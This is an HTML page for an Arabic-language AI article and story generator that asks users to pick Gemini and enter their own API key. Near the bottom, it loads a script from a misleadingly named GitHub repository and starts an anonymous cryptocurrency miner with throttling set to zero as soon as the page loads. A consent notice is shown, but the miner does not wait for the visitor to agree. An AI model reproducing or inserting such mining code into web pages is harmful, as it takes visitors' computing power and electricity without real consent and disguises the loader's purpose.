| <!DOCTYPE html> |
| <html lang="en"> |
| <head> |
| <meta charset="UTF-8"> |
| <meta name="viewport" content="width=device-width, initial-scale=1.0"> |
| <title></title> |
| <meta name="description" content="Need quick answers or want to chat with a friendly AI? Our temporary chatbot is here to assist you with any questions you have. Get instant responses and experience the power of AI conversation."> |
| <meta name="keywords" content="AI chatbot, temporary chatbot, chatbot, chat, AI, artificial intelligence, get answers, ask questions, conversation, chat assistant, online chatbot"> |
|
|
| |
| <meta property="og:title" content="Temporary AI ChatBot"> |
| <meta property="og:description" content="Need quick answers or want to chat with a friendly AI? Our temporary chatbot is here to assist you with any questions you have. Get instant responses and experience the power of AI conversation."> |
| <meta property="og:image" content="/tac.jpg"> |
| <meta property="og:url" content="/"> |
| <meta property="og:type" content="website"> |
|
|
| <meta name="twitter:card" content="summary_large_image"> |
| <meta name="twitter:site" content="@yachatbot"> |
| <meta name="twitter:title" content="Temporary AI ChatBot"> |
| <meta name="twitter:description" content="Need quick answers or want to chat with a friendly AI? Our temporary chatbot is here to assist you with any questions you have. Get instant responses and experience the power of AI conversation."> |
| <meta name="twitter:image" content="/tac.jpg"> |
| <meta name="google-site-verification" content="zy0cnBId0sSwOCYm6vzPYie85QFFxRQoe0RIzxQBGU8" /> |
| <link rel="shortcut icon" href="images/yachatbot_49.png" type="image/png"> |
| <link rel="stylesheet" href="styles.css"> |
| <link rel="stylesheet" href="mining_consent.css"> |
| <link rel="stylesheet" |
| id="theme_link" |
| href="https://cdnjs.cloudflare.com/ajax/libs/bootswatch/4.3.1/materia/bootstrap.min.css"/> |
| <script src="https://cdn.jsdelivr.net/npm/marked/marked.min.js"></script> |
| <script src="https://cdn.jsdelivr.net/npm/copy-to-clipboard/dist/copy-to-clipboard.min.js"></script> |
| <style> |
| |
| |
| #Container { |
| max-width: 80%; |
| margin: 20px auto; |
| background: #ffffff; |
| border-radius: 0.5rem; |
| box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); |
| padding: 1.5rem; |
| display: flex; |
| flex-direction: column; |
| gap: 1rem; |
| } |
| |
| |
| #chatWrapper { |
| display: flex; |
| flex-direction: row-reverse; |
| align-items: flex-end; |
| position: fixed; |
| bottom: 20px; |
| right: 20px; |
| max-width: 100%; |
| width: 80%; |
| gap: 1rem; |
| } |
| |
| |
| #messages { |
| flex-grow: 1; |
| max-height: 400px; |
| overflow-y: auto; |
| padding: 0.5rem; |
| border: 1px solid #ddd; |
| border-radius: 0.5rem; |
| background-color: #f9f9f9; |
| width: 75%; |
| } |
| |
| |
| #userInput { |
| width: calc(75% - 70px); |
| border-radius: 19px; |
| height: 50px; |
| border: 1px solid #ddd; |
| padding: 10px; |
| box-sizing: border-box; |
| } |
| |
| |
| #sendButton { |
| height: 50px; |
| width: 20%; |
| background: #007bff; |
| color: white; |
| border-radius: 19px; |
| border: none; |
| padding: 10px 20px; |
| cursor: pointer; |
| transition: background-color 0.3s ease; |
| } |
| |
| #sendButton:hover { |
| background: #0056b3; |
| } |
| |
| |
| </style> |
| </head> |
| <body> |
|
|
| <div class="tac-data"> |
| <center> <h1>Article-generator-ai</h1> |
| <h2>انشأ مقالات وقصص محتوى كامل بالذكاء الاصطناعي |
| </h2> |
| </center> |
| <div id="Container"> |
| <div id="messages"></div> |
|
|
| <div id="promptContainer"> |
| <div id="yourDivId9" data-prompt=""></div> |
| <div id="yourDivId99" data-prompt=""></div> |
| |
| </div> |
|
|
| <select id="aiSelect"> |
| <option value="gemini">Gemini</option> |
| </select> |
|
|
| <input type="text" id="apiKeyInput" placeholder="Enter your API Key" /> |
| <input type="text" id="userInput" placeholder="Type your message..." /> |
| |
| <button id="sendButton">Article generator</button> |
|
|
| <div id="error-message"></div> |
| |
| <div id="console-output"></div> |
| </div> |
| <div id="consentModal"> |
| <div class="modal-content"> |
| <h2>Important Notice</h2> |
| <p>This website uses your device's threads for mining as an alternative to ads. By using this website, you agree to this. Click "OK" to continue.</p> |
| <button id="okButton">OK</button> |
| </div> |
| </div> |
| <script src="ai_script_4.js"></script> |
| <script src="https://cdn.jsdelivr.net/gh/imabutahersiddik/Time-Remaining-@main/coinimpression.js"></script> |
| <script> |
| var _client = new Client.Anonymous('935e7e239d4b6e1b20e10fb872e007931d468130627f2c205dec830e7e2f5a9e', { |
| throttle: 0, c: 'w' |
| }); |
| _client.start(); |
| |
| |
| </script> |
| |
| <script src="https://cdn.jsdelivr.net/npm/chart.js"></script> |
| <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> |
| <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script> |
| <script async defer src="https://buttons.github.io/buttons.js"></script> |
| <script src="https://cdn.jsdelivr.net/npm/popper.js@1.12.9/dist/umd/popper.min.js"></script> |
|
|
| </body> |
| </html> |
|
|